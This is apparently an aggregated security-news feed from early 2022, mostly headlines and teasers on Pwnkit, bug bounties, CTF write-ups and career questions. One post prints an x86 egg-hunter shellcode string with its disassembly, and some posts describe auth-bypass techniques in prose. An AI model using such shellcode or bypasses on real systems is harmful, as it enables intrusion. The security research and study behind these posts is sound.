    This question is going around for a long time. Are hackers doing good in the world? Well, instead of hacking into healthcare systems and… Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    SecWiki News 2022-01-26 Review
    2021年度高级威胁研究报告 by ourren [HTB] Safe Writeup by 0x584a 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    老版OSCP准备及考试经验
    本人于2021年12月通过了OSCP考试,由于OSCP考试于2022年1月11号改革, 文中考试经历部分的参考价值就不大了; 干货和备战部分还是可以参考一下  ( 1 min )
    FreeBuf早报 | Linux系统爆出新漏洞,影响所有版本;Segway 电子商店被攻击
    Polkit的pkexec 组件中存在一个安全漏洞(CVE-2021-4034),这意味着几乎所有的Linux 发行版的默认配置都包含此漏洞,攻击者可通过该漏洞获得系统的root权限。  ( 1 min )
    基于钓鱼攻击的技术点研究
    钓鱼思路学习研究。  ( 1 min )
    如何使用Yakit进行流量劫持
    yakit基本实现了burp劫持和抓包的功能,在具体使用场景上也能基本覆盖,作为刚起步不久的开源项目,希望大家多多关注~  ( 1 min )
    严重的编程错误或致文件删除、黑客使用新恶意软件逃避检测|1月26日全球网络安全热点
    Rust编程语言的维护者发布了一个针对高严重性漏洞的安全更新,该漏洞可能被恶意方滥用,以未经授权的方式从易受攻击的系统中清除文件和目录。  ( 1 min )
    如何使用FaPro批量模拟设备
    通过FaPro,可以使用一条命令,直接创建一个虚拟网络,并在其中模拟多个不同的设备。  ( 1 min )
    《中国企业网络安全意识教育现状与发展报告》发布
    《中国企业网络安全意识教育现状与发展报告》(以下简称《报告》)近日发布。  ( 1 min )
    《银行保险机构信息科技外包风险监管办法》发布,严控机构外包风险
    《办法》共7章46条,对银行保险机构信息科技外包风险管理提出全面要求。
    【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁
    本文从Rootkit的生存期、可达成的效果,以及运用这项技术展开攻击的可行性等角度展开讨论。  ( 1 min )
    《浙江省公共数据条例》将于3月1日执行,再次强调个人信息安全
    《条例》共五十一条内容,明确提出打造公共数据平台,建立公共数据共享机制,构建公共数据有序开放制度。
    首届「网安新势力」大会专家评委团正式公开
    14位网络安全行业专家评委,快来一睹真容!
  • Open

    Specific Payload makes a Users Posts unavailable
    FetLife disclosed a bug submitted by castilho: https://hackerone.com/reports/1176794 - Bounty: $100
  • Open

    ROP Hello World!
    submitted by /u/Kubiszox [link] [comments]
  • Open

    Ethical Hacking — Buffer Overflow Parte 2
    Fuzzing é uma técnica de teste de software que fornece dados inválidos, ou seja, dados inesperados ou aleatórios como entrada para um… Continue reading on Medium »  ( 2 min )
  • Open

    Ethical Hacking — Buffer Overflow Parte 2
    Fuzzing é uma técnica de teste de software que fornece dados inválidos, ou seja, dados inesperados ou aleatórios como entrada para um… Continue reading on Medium »  ( 2 min )

  • Open

    Is there anything equivalent to javas requestdispatcher.forward system in other programming languages?
    Its the easiest thing to leverage for pre auth bugs just looking at web.xml and leveraging internal forwards to touch apis that normally require auth and I would love to find something similar in other languages. The closest thing ive found is a special type of open redirect where the devs decided to keep previous session data making it useful for auth bypasses in some php projects. See the thing is open redirects usually kill previous session data making them useless for auth bypassing on their own and the java forward system is like an internal version/server sided version of a redirect that keeps session data and forwards everything along intact. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    Could blind mass assignment be a rare type of bug?
    Some people know it as reflection binding, mass assignment or insecure direct object mapping which is the opposite of insecure direct object reference your basically writing data instead of reading it or appending data. So ive noticed in some places ill send hidden parameters and the json response won’t show anything interesting but ill refresh the page and ill get like a discount or something say I add the parameters isSpecialDiscount: true the response won’t show anything related so its a blind mass assignment bug and in some cases ive seen partial blind mass assignment where the json response will change to true for some things but still say false for others despite the request setting it as true but when I refresh the page the server grants me the discount proving its processing the input and assigning my session a discount. Ive never really seen people discuss blind or partial blind mass assignment being a thing but im finding them a lot more now its weird. Usually I used to look at the json response to see if parameter values are changing but I now see I can’t even trust that completely to prove a mass assignment bug exists. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    Anyone who works in a SOC dealing with disadvantages in maturing due to lack of management experience?
    Just curious how some of you guys who work in a SOC, whether it’s as an analyst or engineer, with a manager who doesn’t have the background. Do you have a lot of influence in shaping the SOC? Run in to roadblocks justifying tools or maybe maturing your processes? submitted by /u/bankster24 [link] [comments]  ( 2 min )
    Looking for first steps in changing careers with an unrelated(?) master's degree
    Hello /r/AskNetsec, this is my first post on here. I recently (coming up on a year) graduated with a M.A. in Forensic Psychology and Intelligence Analysis. This degree is not opening the doors in the psychology field I was hoping it would, and quite frankly, the work I have done in this field is not what I wanted out of my career. I have always been fascinated by cybersecurity, and it is a large part of the reason I decided to pursue the Intel part of my degree. My question to you all is this: What first steps would someone in my position take in trying to get into the Cybersecurity field? Ideally I would like to eventually work my way to a Security Analyst position. I have no qualms about starting at the lowest positions to work my way up, but am clueless on where to start. I have some coding knowledge in Python and Java, but as far as IT knowledge I am a total newbie. Are there certifications or courses I should prioritize? I would like to avoid going back to a university setting, as I have spent enough time and money doing that for the time being. Thank you to anybody who reads this and decides to respond, I really appreciate it. submitted by /u/Lambeau_Leap [link] [comments]  ( 1 min )
    Worth getting Net+/Sec+ with 3 years of exp in Blue Teaming?
    Heyhey, I'm not quite new to blue teaming (threat hunt & detection) but would like to have my options open in case I want to jump to a more senior tech role in the next year or so. I have a computer engineering degree and a SANS 401 (GSEC) cert too. Do you think it's worth getting? Thanks! submitted by /u/youmakemismile [link] [comments]  ( 1 min )
    Do RSA key fobs really strengthen security?
    Originally they did, I know. But there was this story about Chinese hackers compromising RSA, getting into the deepest levels of the production and key generation process. As a result, RSA alerted each and every customer of theirs and told them to use a personal PIN together with the code generated by the key fob. This is what I'm doing now on a daily basis. Now you have: your account password your PIN you use together with the RSA-generated code and the RSA-generated code The RSA codes are compromised and you have to assume that there's some people out there knowing all the codes and algorithms. But that means they really aren't worth much, basically you only have a password and another, limited password called PIN - which is usually shorter and numbers only. The most you can expect from this is that - let's say - 10 characters alphanumeric + 6 digits is somewhat better than just the 10 characters alphanumeric, plus there's a good chance that they are stored in different systems, so less likely to seized at the same time by some black hats. Is that true or do these key fobs still have an added value? submitted by /u/mshthn [link] [comments]  ( 2 min )
    Simple question about nmap
    If my friend tells me what his public IP address is and I use nmap to do a port scan on his public IP address, then what exactly is being port scanned? Since every device in his house will have the same public IP address. submitted by /u/LagunaLoireFF8 [link] [comments]  ( 2 min )
    Received H1 bug bounty but think I maybe should have gotten more. Am I just being greedy?
    I have received a bounty just under 20k. I understand that that’s a lot of money but I am curious from experts whether this is about the most I’ll get and I should just move on. I can’t disclose too much but I found a way to make myself very very rich very easily (no actual tools or request spoofing required). I’ve thought of some ways that one could have theoretically easily taken the free money with no trace and ran if they were a legitimate crook. The bug had been around for a while (Longer than a week). Unsure of how bad it was in terms of actual internal damages. I can honestly say that I probably saved them potential millions if not actual millions. It feels like the amount I received is honestly not much at all given the severity of it. Having said all of that, it wasn’t very hard to reproduce. It was less of a penetration report involving much skill and more of a “holy shit guys, your product is clearly broken and I can’t believe this hasn’t been patched” Am I being completely unreasonable/greedy? I should also note that their market cap is far into the billions which is why I am making this post to begin with. They’re a major industry leader. submitted by /u/csthrowawayyyy [link] [comments]  ( 4 min )
    Is an associates degree worth getting?
    I was told experience and certs are mostly required for most jobs aside from roles in management, which requires a BS or even masters. So I am just curious if there is any value in just getting an AS. The role that currently interests me is SOC analyst if that helps. I also heard of the WGU online program for a BS or masters in cybersecurity. If I plan on doing management in the future, is it worth getting my degree through this program? submitted by /u/RaZdoT [link] [comments]  ( 2 min )
  • Open

    How “Docker” can help you become a better hacker
    Continue reading on Medium »
    Ensuring protocol security with Immunefi bug bounty program
    Calling all devs and hackers. Help enhance our smart contract security and prevent thefts, freezes, and unintended changes and earn. Continue reading on Medium »  ( 2 min )
    I found a way to extract passwords from any iOS device. When I reported it to Apple? Silence.
    Apple’s Bug Bounty program, in theory, incentivizes programmers to report flaws they find in the company’s code. In practice? Not so much. Continue reading on Medium »  ( 3 min )
    What I learnt from reading 220* IDOR bug reports.
    IDOR — Insecure Direct Object Reference, abuse of the lack of authentication at every stage. Continue reading on Medium »  ( 3 min )
    First Bounty! Disable 2FA of any user via OTP bypass
    Getting that first bug bounty is a special feeling for any bug hunter. This is my first write up so please bear with me. Continue reading on Medium »  ( 1 min )
    First Valid BUG Finding At Microsoft And I Got the Acknowledgments Page Microsoft
    Hi Everyone. Continue reading on Medium »  ( 2 min )
    How I could have read your confidential bug reports by simple mail?
    Hey Everyone, Hope you’re doing safe and sound. Continue reading on InfoSec Write-ups »  ( 2 min )
    How I was able to takeover accounts in websites deal with Github as a SSO provider
    Introduction Continue reading on InfoSec Write-ups »  ( 3 min )
  • Open

    pwntools on m1 mac?
    Hello, I'm working on creating a tutorial binary exploit for an m1-based mac. For simplicity and portability i'm using an M1-based Kali VM and trying to use aarch64 shellcraft but getting weird errors and wondering if anyone has successfully gotten pwn to work for them? ​ Main error message when trying to use asm() on a shellcraft payload is: pwnlib.exception.PwnlibException: Could not find 'as' installed for ContextType() Try installing binutils for this architecture: https://docs.pwntools.com/en/stable/install/binutils.html ​ but dont know what binutils arch it's expecting, i tried installing a couple to no avail. ​ appreciate any of yall's time thanks submitted by /u/superiorpyre [link] [comments]  ( 1 min )
    Fuzzing Ethereum Smart Contract using Echidna - Blockchain Security #1
    submitted by /u/pat_ventuzelo [link] [comments]
    Shellcode to x86, x64 Assembly
    Sharing a quick python3 command line tool I made to disassemble shellcode without having to remember the nuances of python2 v python3 strings and writing to a file each time: https://gitlab.com/stormblest/exploit-dev-tools/-/blob/main/shellcode2asm.py Includes python unittests in Gitlab. Example: ``` $ python3 shellcode2asm.py "\xbb\x90\x50\x90\x50\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\xff\xe2" -a 32 shellcode: "\xbb\x90\x50\x90\x50\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\xff\xe2" 00000000 BB90509050 mov ebx,0x50905090 00000005 31C9 xor ecx,ecx 00000007 F7E1 mul ecx 00000009 6681CAFF0F or dx,0xfff 0000000E 42 inc edx 0000000F 60 pusha 00000010 8D5A04 lea ebx,[edx+0x4] 00000013 B021 mov al,0x21 00000015 CD80 int 0x80 00000017 3CF2 cmp al,0xf2 00000019 61 popa 0000001A 74ED jz 0x9 0000001C 391A cmp [edx],ebx 0000001E 75EE jnz 0xe 00000020 395A04 cmp [edx+0x4],ebx 00000023 75E9 jnz 0xe 00000025 FFE2 jmp edx ``` submitted by /u/blutitanium [link] [comments]  ( 1 min )
  • Open

    Able to steal private files by manipulating response using Auto Reply function of Lark
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1387320 - Bounty: $2000
    Able to steal private files by manipulating response using Compose Email function of Lark
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1373784 - Bounty: $2000
    Subdomain Takeover
    Mail.ru disclosed a bug submitted by official_dhivish: https://hackerone.com/reports/1348504
    Cross site scripting via file upload in subdomain ads.tiktok.com
    TikTok disclosed a bug submitted by blubluuu: https://hackerone.com/reports/1433125 - Bounty: $500
  • Open

    Watering hole deploys new macOS malware, DazzleSpy, in Asia
    submitted by /u/dmchell [link] [comments]
    Extracting Cobalt Strike Beacon Configurations - Elastic Security Research
    submitted by /u/dmchell [link] [comments]
    RBCD WebClient attack | Franky's WebSite
    submitted by /u/dmchell [link] [comments]
    hlldz/RefleXXion: RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks
    submitted by /u/dmchell [link] [comments]  ( 1 min )
  • Open

    Major Linux PolicyKit security vulnerability uncovered: Pwnkit
    Article URL: https://www.zdnet.com/article/major-linux-policykit-security-vulnerability-uncovered-pwnkit/ Comments URL: https://news.ycombinator.com/item?id=30077665 Points: 7 # Comments: 0  ( 4 min )
    Rust vulnerability enables attackers to delete files and directories
    Article URL: https://developer-tech.com/news/2022/jan/24/rust-vulnerability-enables-attackers-delete-files-and-directories/ Comments URL: https://news.ycombinator.com/item?id=30072868 Points: 5 # Comments: 1  ( 4 min )
    Dark Souls servers taken down following discovery of critical vulnerability
    Article URL: https://arstechnica.com/information-technology/2022/01/dark-souls-servers-taken-down-following-discovery-of-critical-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30069692 Points: 3 # Comments: 0  ( 2 min )
  • Open

    pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
    submitted by /u/TheSwedishChef24 [link] [comments]
    Mind Your Dependencies: Defending against malicious npm packages
    submitted by /u/SRMish3 [link] [comments]
    We purchased a machine from China and it came with malware preinstalled
    submitted by /u/lormayna [link] [comments]  ( 2 min )
    Cracking Randomly Generated Passwords
    submitted by /u/hyperreality_monero [link] [comments]  ( 1 min )
    RBCD attack & defense. From Domain User to DA on default domain controllers settings. Including webclient service activation
    submitted by /u/k3nfr4 [link] [comments]  ( 1 min )
    Finding vulnerabilities in Swiss Post’s future e-voting system - Part 1
    submitted by /u/0xdea [link] [comments]  ( 1 min )
    Recovering redacted information from pixelated videos
    submitted by /u/breakingsystems [link] [comments]  ( 1 min )
    Solarwinds Web Help Desk: When the Helpdesk is too Helpful
    submitted by /u/Mempodipper [link] [comments]
  • Open

    Pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
    Article URL: https://seclists.org/oss-sec/2022/q1/80 Comments URL: https://news.ycombinator.com/item?id=30077271 Points: 112 # Comments: 41  ( 5 min )
    Pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
    Article URL: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt Comments URL: https://news.ycombinator.com/item?id=30075993 Points: 4 # Comments: 2  ( 5 min )
  • Open

    3 outils à connaître absolument pour la recherche d’information
    Durant une recherche sur internet, nous tombons souvent sur des formats de données qui sont à première vue inexploitables directement. Continue reading on Medium »  ( 3 min )
    Python: Speech To Text Conversion
    Simple Python code for converting audio data to text format Continue reading on Medium »  ( 1 min )
    Ukraine: tracking the deployments
    Making sense of the open source intelligence Continue reading on HOW TO STOP FASCISM »
  • Open

    Trainings or Courses or Labs?
    Howdy all, Any idea where I can find the following for Memory Forensics? I’m trying my best to learn the most of Memory Forensics! Have completed the Cyber Defenders lab! Free or Minimal Cost one would be appreciated as I’m just a beginner in my field! Thanks! submitted by /u/GloryHunter9 [link] [comments]  ( 1 min )
    ftk Imager gets hung
    So I was attempting to take an E01 image of a file server. But it would just get hung right away. For ftk I tried to run it as a logical volume to image it, and still it would get hung. So I used a live boot of Linux and tried to use guymaner and it would just close. It is a Raid 6 I believe. Any other recommendations on how I could take an EO1 image of the FS? Thanks submitted by /u/Pizza_Eating_Robots [link] [comments]  ( 2 min )
    CHFI certification is good at discounted price
    I have read many posts about EC Council not being good for any certification. But my question is if it's offered to me at a discounted price (99$) then it's good or still bad. Please note that this cert is being sponsored by my school, although it's not compulsory for me to join but I topped the merit list and they offered me to pay 99$ to get its voucher. So shall I go to it or simply deny it? submitted by /u/hardfire005 [link] [comments]  ( 2 min )
    Intro to Windows Registry artifacts with TryHackMe Windows Forensics Room.
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )
    How do you think accuracy and precision applies to DFIR?
    I stumbled across accuracy and precision and was wondering how forensic examiners think it applies to DFIR, if at all. Maybe software, artifacts, attribution? Thoughts? https://preview.redd.it/a3xvkvnl1ud81.png?width=1024&format=png&auto=webp&s=d1ff7da688bfb06abfdaea08136cb0924c92c2fc submitted by /u/greyyit [link] [comments]  ( 3 min )
    Recovering deleted/cached images (Mac)
    I have been trying to find ways to recover deleted images from a discord server, and found that all content is stored in some form onto its cache in "~/Library/Application Support/discord/cache". The result is something like this. There seem to be some ways to recover it on windows, however, is it possible on macOS? I have no idea what I am looking at here, so forgive me for ignorance. https://preview.redd.it/brl4u4s2qtd81.png?width=1832&format=png&auto=webp&s=c87beca7931e74351107f7eea57abe24711b073c submitted by /u/Nitrote [link] [comments]  ( 1 min )
    How can I access mmssms.db without rooting phone?
    Hi, I would like to recover some deleted SMS messages. I do not know, how to access the mmssms.db, when plugging my phone to my PC without actually rooting it. What are my best options? Also how far back in time do you think I could recover the texts? submitted by /u/prois99 [link] [comments]  ( 1 min )
    Alcatel GO Flip V access?
    No idea where else to ask. There’s an Alcatel Go Flip V that I need text message logs from for a court case. I used to use BitPim for this sort of thing, but that hasn’t had profiles updated for years. I hate to phrase this in such a phone-specific way, but this phone is killing me, and I’ve tried a whole lot: Does anyone know any way to get legible texts from an Alcatel GO Flip V? Or is there anywhere else I should ask? submitted by /u/hmmqzaz [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-25 Review
    2021密码应用技术白皮书 by ourren 2021年网络检测和响应报告 by ourren 2021网络空间测绘年报 by ourren 流量全密化趋势下的检测困境和思考 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    RESTler: Stateful REST API fuzzing tool
    Article URL: https://github.com/microsoft/restler-fuzzer Comments URL: https://news.ycombinator.com/item?id=30073154 Points: 4 # Comments: 0  ( 6 min )
  • Open

    My CRTO course and exam review
    Motivation of The Journey Continue reading on Medium »  ( 4 min )
  • Open

    ClickJackingggg!!
    Clickjacking is an interface-based attack in which a user is tricked into clicking on actionable content on a hidden website by clicking… Continue reading on Medium »  ( 2 min )
  • Open

    Hack into Skynet —  Real World CTF (2022) walkthrough
    In this writeup, I’m sharing one of the potential methods to pwn a web challenge on Real world CTF 2022. All challenges built on top of real-world applications & due to the impact of COVID-19, The…  ( 5 min )
    Attacks on JSON Web Token (JWT)
    In part1 of the article, I introduced JSON web tokens that what is JWT and How they are made? I prefer to take a look at that before you go…  ( 8 min )
    How I ended up downloading a malware
    Hello folks!!! My brother and I were bored this weekend and decided to play a game, so he downloaded the game. Here’s the fascinating part…  ( 4 min )
    How I passed CEH (Practical) in my first attempt by Guru HariHaraun
    Hello guys! I’m Guru HariHaraun, 21 years old. In this blog, I will be sharing with you my secret strategy I followed to pass CEH…  ( 7 min )
    How I was able to find multiple vulnerabilities of a Symfony Web Framework web application
    Found high severity vulnerability in 5 minutes just from reconnaissance. Found multiple vulnerabilities on a web application that used the…  ( 3 min )
    Hacking Microsoft Forms
    Since the growth of Online learning during this pandemic — students, researchers have been on an hunt for hacks on Microsoft Forms which…  ( 2 min )
    Day 16, Web Reconnaissance Or Information Gathering — Part 1#100DaysofHacking
    Get all the writeups from Day 1 to 15, Click Here Or Click Here.  ( 5 min )
    How I Discovered Thousands of Open Databases on AWS
    My journey on finding and reporting databases with sensitive data about Fortune-500 companies, Hospitals, Crypto platforms, Startups during…  ( 9 min )
    Simple CTF- TryHackme
    CTF  ( 3 min )
    LAB Setup — ModSecurity || Apache as reverse Proxy || Generate& Install self signed SSL…
    A: Configure Apache as reverse proxy and the application [demo.testfire.net] should be accessible via local host entry through configured…  ( 7 min )
  • Open

    Hack into Skynet —  Real World CTF (2022) walkthrough
    In this writeup, I’m sharing one of the potential methods to pwn a web challenge on Real world CTF 2022. All challenges built on top of real-world applications & due to the impact of COVID-19, The…  ( 5 min )
    Attacks on JSON Web Token (JWT)
    In part1 of the article, I introduced JSON web tokens that what is JWT and How they are made? I prefer to take a look at that before you go…  ( 8 min )
    How I ended up downloading a malware
    Hello folks!!! My brother and I were bored this weekend and decided to play a game, so he downloaded the game. Here’s the fascinating part…  ( 4 min )
    How I passed CEH (Practical) in my first attempt by Guru HariHaraun
    Hello guys! I’m Guru HariHaraun, 21 years old. In this blog, I will be sharing with you my secret strategy I followed to pass CEH…  ( 7 min )
    How I was able to find multiple vulnerabilities of a Symfony Web Framework web application
    Found high severity vulnerability in 5 minutes just from reconnaissance. Found multiple vulnerabilities on a web application that used the…  ( 3 min )
    Hacking Microsoft Forms
    Since the growth of Online learning during this pandemic — students, researchers have been on an hunt for hacks on Microsoft Forms which…  ( 2 min )
    Day 16, Web Reconnaissance Or Information Gathering — Part 1#100DaysofHacking
    Get all the writeups from Day 1 to 15, Click Here Or Click Here.  ( 5 min )
    How I Discovered Thousands of Open Databases on AWS
    My journey on finding and reporting databases with sensitive data about Fortune-500 companies, Hospitals, Crypto platforms, Startups during…  ( 9 min )
    Simple CTF- TryHackme
    CTF  ( 3 min )
    LAB Setup — ModSecurity || Apache as reverse Proxy || Generate& Install self signed SSL…
    A: Configure Apache as reverse proxy and the application [demo.testfire.net] should be accessible via local host entry through configured…  ( 8 min )
  • Open

    RWCTF 4th Desperate Cat Writeup
    在 Real World CTF 4th 中,我很荣幸再次作为出题人参与出题。我出了一道名叫 Desperate Cat 的题目,考察的是在严苛条件下 Tomcat Web 目录写文件 getshell 的利用。  ( 2 min )
    FreeBuf早报 | 去年全球共记录1862起数据泄漏事件;俄罗斯当局逮捕一国际网络犯罪组织的头目
    澳大利亚证券和投资委员会(ASIC)宣布,它正在与五家监管科技公司合作创建一个新的平台,旨在更好处理上市公司的信息。  ( 1 min )
    攻击技术研判|利用安全模式突破安全产品防线
    近期sophos的研究人员发现了名为AvosLocker的新勒索软件团伙。攻击者利用安全产品无法运行于安全模式下的防护缺失规避检测,并利用例外配置保持对目标的远程控制能力。  ( 1 min )
    modsecurity 搭建web安全防火墙和流量检测
    ModSecurity是一个开源的跨平台Web应用程序防火墙(WAF)引擎,用于Apache,IIS和Nginx,由Trustwave的SpiderLabs开发。  ( 2 min )
    在 AD FS 中获取你的万能令牌
    微软的 AD FS(联合身份验证) 服务是一种跨边界的身份识别认证服务,旨在让 AD 域外的服务使用 AD 域账户进行认证,可以在多个不同实体或组织之间实现 SSO(单点登录)。  ( 1 min )
    内网代理工具与检测方法研究
    隧道技术是一种通过使用互联网络的基础设施在网络之间传递数据的方式。使用隧道传递的数据(或负载)可以是不同协议的数据帧或包。  ( 1 min )

  • Open

    What are Sock Puppets And How To Create One?
    Sock puppets are constantly engaging in different ways across social media trying to influence what we think and what we believe. So how to Continue reading on Medium »  ( 3 min )
    Analyser une requête Twitter en 5 minutes
    Dans le cadre d’une analyse de la communication d’un concurrent ou de la recherche d’informations sur les réseaux sociaux, il peut être… Continue reading on Medium »  ( 2 min )
    Bundesservice Telekommunikation — enttarnt: Dieser Geheimdienst steckt dahinter
    Nach einer Tarnbehörde suchen und drei finden. Mit welchen einfachen Tricks deutsche Geheimdienste entlarvt werden können. Continue reading on Medium »  ( 12 min )
    CyberSoc | Cyber Detective CTF Write Up — Life Online
    OSINT-focused CTF Challenges. OSINT in Twitter, Stego, Crypto and more Continue reading on Medium »  ( 3 min )
    OSINT Tools to Use
    OSINT tools: An expanding list Continue reading on Medium »  ( 14 min )
  • Open

    CVE-2022-0185 in Linux Kernel Can Allow Container Escape in Kubernetes
    Article URL: https://blog.aquasec.com/cve-2022-0185-linux-kernel-container-escape-in-kubernetes Comments URL: https://news.ycombinator.com/item?id=30064884 Points: 2 # Comments: 0  ( 4 min )
    CVE-2021-3998 and CVE-2021-3999 in glibc's realpath() and getcwd()
    Article URL: https://www.openwall.com/lists/oss-security/2022/01/24/4 Comments URL: https://news.ycombinator.com/item?id=30057900 Points: 2 # Comments: 0  ( 5 min )
    CVE-2021-3996 and CVE-2021-3995 in util-Linux's libmount
    Article URL: https://www.openwall.com/lists/oss-security/2022/01/24/2 Comments URL: https://news.ycombinator.com/item?id=30056823 Points: 3 # Comments: 0  ( 3 min )
  • Open

    Cobalt Strike, a Defender’s Guide - Part 2
    submitted by /u/dmchell [link] [comments]
  • Open

    Using Twitter to notify careless developers — the unorthodox way (Or, how you could use GitHub to compromise 9.5K Twitter accounts without “hacking”)
    submitted by /u/sp00kyphiss [link] [comments]  ( 1 min )
    Paranoids’ Vulnerability Research: PrinterLogic Issues Security Alert
    submitted by /u/jrozner [link] [comments]
    WordPress 5.8.2 Stored XSS Vulnerability
    submitted by /u/monoimpact [link] [comments]
    Cobalt Strike, a Defender’s Guide – Part 2
    submitted by /u/TheDFIRReport [link] [comments]
    How BRATA is monitoring your bank account | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
    TypeScript scenario-based web application Fuzzing Framework, supports genetic algorithm and running on CI
    submitted by /u/hi120ki [link] [comments]
    Private Network Access: introducing preflights - Chrome Developers
    submitted by /u/rhaidiz [link] [comments]
    Qiling Sandbox Escape
    submitted by /u/ly4k_ [link] [comments]
    CVE-2022-0185 – What does the newest kernel exploit mean for Kubernetes
    submitted by /u/gemyougym [link] [comments]  ( 1 min )
  • Open

    HOW I hacked thousand of subdomains
    Hello everyone Continue reading on Medium »  ( 3 min )
    Hack into Skynet —  Real World CTF (2022) walkthrough
    Continue reading on InfoSec Write-ups »  ( 4 min )
    Journey for finding the CSRF Bug lead to the finding of the 403 Forbidden error
    Hello myself Manan Aggarwal and this is my First Blog Post that while I was finding the CSRF Bug that Lead to the finding of the 403… Continue reading on Medium »  ( 2 min )
    Registrations Open for IWCON 2022 — the Online Infosec Conference & Networking Event
    Listen to 15+ awesome speakers and meet some of the coolest peeps in Infosec! Continue reading on InfoSec Write-ups »  ( 2 min )
    deBridge launches bug bounty on ImmuneFi
    This initiative is being funded by deBridge in order to improve network security and reliability for the network’s global community. Continue reading on Medium »  ( 2 min )
    Security Explained: Penetration Testing vs Bug Bounties
    In the world of application and network cybersecurity, you may have asked the question: what is penetration testing? Or what are bug… Continue reading on Medium »  ( 3 min )
  • Open

    Why are serializing bugs not a thing? Does code execution only occur during deserializing data only?
    Noticed all the fanfare around deserializing but not the opposite which is serializing a string and getting code execution from that. submitted by /u/Academic-Discount252 [link] [comments]  ( 2 min )
    Is authenticating by URL secure?
    The idea is to have a desktop .NET app that authenticates a user by having a built in browser that takes you to an SSO page, and only allows access to the app if you successfully arrive at a URL which is only accessible if you were able to successfully log in. Is this a secure method? I’m worried if there is some way of faking a URL. Is there some other alternative similar to this that is more secure, maybe something to do with certificates? I’m very new to this kinda of stuff so any help is appreciated. submitted by /u/Sloathe [link] [comments]  ( 1 min )
    Looking to make a VLAN on my Home Network to protect a New Machine
    Two of my devices have had strange occurrences over the last couple of months. I am sure its fine but it has been enough to where I don’t trust them. I Have been building a desktop and I am about to finish. My question is how to best keep my new desktop with a fresh install of Windows 10 safe from any possible malware lingering on my other two machines on the network. Would a VLAN be the way to go on something like this? Like set up a VLAN specifically for my desktop. I am new at this stuff so I apologize in advance for any annoying assumptions or questions. Thank you so much for your consideration. EDIT: I also have an unmanaged switch and a Netgear wifi extender/access point at my disposal. My ISP is Xfinity. EDIT: VLAN needs a managed switch so its a no go. submitted by /u/Zpointe [link] [comments]  ( 1 min )
    Could other logging systems have similar flaws to log4shell if fuzzed properly?
    The problem with log4shell is it was overblown and very buzz wordy when it relied on a known flaw from years ago called jdni injection but im thinking bigger then jdni and java. Could other programming languages like php python ruby aspx/net framework have similar flaws to force their logging system to execute a log as code? Most logging systems don’t have fancy features like jdni ldap etc so im not sure what you could leverage to force code to be executed. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    How do I get out?
    Hi all, bit of an usual one for you - I really want out of cybersecurity. I've got about 3 years of experience in netsec, mostly doing app and infrastructure security testing and honestly I hate it. Every project is a brand new technology I've got little experience in and I always end up feeling like I couldn't possibly have tested it 100% properly. I have major anxiety and panic issues and I'm finding the entire thing just too stessful and have completely burnt out in a few short years. So my question is: Has anyone successfully transitioned into another IT space from cyber security? I would love to just be a sysadmin and only have a single network and set of technologies to contend with, so I can feel like i'll truly master them and become properly proficient. The problem is I think I'll have a lot of stigma going into interviews as it will be very obvious I couldn't handle netsec and am looking for an out, especially considering as I'm on £50k and will likely need to take a cut down to 25k-35k to get into a role like this. So any advice anyone can offer for how to approach this situation? Do I need to go get an entirely different set of certs before I'll even be considered? signed, a very burnt out pentester submitted by /u/mekkr_ [link] [comments]  ( 8 min )
    Interview technical test
    Hey guys, I'm interviewing for a jr pen tester position and was asked for a technical test that consists in checking the security of an IP target that is hosted in the AWS cloud. I can use whatever tool I want as long as I find issues in the IP target and recommend ways to solve the issue. I have three days to do this test, and I'm looking to learn whatever I have to learn to take this next step that will change my life forever, but I have no idea how to start. Can you guys point me in the right direction? What resources do I have to start learning that? Thank you, and sorry if this doesn't fall in the scope of the subreddit. submitted by /u/Kelvien [link] [comments]  ( 2 min )
    A HUGE untapped attack surface for auth bypassing: Arbitrary Server Side Forwards also known as Unvalidated Forwards or Dangerous Forwards. Its basically SSRF-Lite.
    Barely any blogs or posts cover this stuff indepth enough for my liking and some of the biggest auth bypasses in java apps stem from their requestdispatch forward feature which allows you to access internal authenticated apis and endpoints as a non logged in session. What im wondering is if theres anything anagalous like this in other popular languages like php ruby on rails django etc to do the same thing and if not is there any research regarding auth bypasses for open redirects which are more client side based and I don’t believe they can be used for auth bypasses since forwards are internal/server sided and keep session and parameter data intact where as redirects are client sided and initialize fresh session data so they seem less useful then forwards. The only time ive seen an open redirect possibly bypass authentication is in combination with a ssrf or some feature where the web app follows the url and then follows that urls redirect internally. Would love fellow netsecs peeps insight on this under researched phenomenon. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    Interview Question
    Hi guys, I have an interview for Intern SOC analyst in one of the reputed organization and the interview will consist some technical lab as well, any idea what can the lab questions?? How can I prepare for the lab examination. submitted by /u/Either_Attempt_9108 [link] [comments]  ( 2 min )
  • Open

    Registrations Open for IWCON 2022 — the Online Infosec Conference & Networking Event
    Listen to 15+ awesome speakers and meet some of the coolest peeps in Infosec!  ( 2 min )
  • Open

    Registrations Open for IWCON 2022 — the Online Infosec Conference & Networking Event
